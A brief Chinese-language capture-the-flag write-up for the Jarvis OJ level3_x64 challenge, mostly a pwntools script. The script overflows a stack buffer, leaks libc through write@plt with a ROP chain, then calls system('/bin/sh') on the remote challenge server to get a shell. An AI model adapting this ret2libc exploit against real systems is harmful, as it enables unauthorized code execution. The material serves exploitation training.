Jarvis OJ---level3_x64

与level2_x64类似，也是x64位的一个程序，但是程序之中并没有直接调用system函数，也没有bin/sh参数，只提供了一个libc库，所以是要让我们通过libc库泄露system函数的地址和binsh的地址，这里要注意的是依旧是寄存器的问题，所以我们要构建gadget，rop绕过，通过泄漏出system函数的地址，然后在bss段中写入binsh参数，调用system函数从而getshell

from pwn import *
from time import *
p = remote('pwn2.jarvisoj.com',9883)

write_plt = 0x04004B0
write_got = 0x0600A58
poprdiret = 0x04006b3 
start = 0x04004F0
poprsiret = 0x04006b1
write_libc_address = 0x00000000000eb700  #readelf -a ./libc-2.19.so | grep " write@"
bin_sh_libc_address = 0x17c8c3       #strings -a -t x libc-2.19.so | grep "/bin/sh"
system_libc_address = 0x0000000000046590 #readelf -a ./libc-2.19.so | grep " system@"
exit_libc_address = 0x000000000003c1e0   #readelf -a ./libc-2.19.so | grep " exit@"



payload1 = '\x00'*(0x80+8) + p64(poprdiret) + p64(1)+ p64(poprsiret)+p64(write_got) + p64(1) + p64(write_plt) +p64(start)
p.recvuntil("Input:\n")
p.sendline(payload1)
leak = u64(p.recv(8))

libc_base = leak - write_libc_address
system = libc_base + system_libc_address
binsh = libc_base + bin_sh_libc_address
exit = libc_base + exit_libc_address

payload = 'a'*(0x80+8) + p64(poprdiret) + p64(binsh) + p64(system) +p64(exit)
p.sendline(payload)
p.interactive()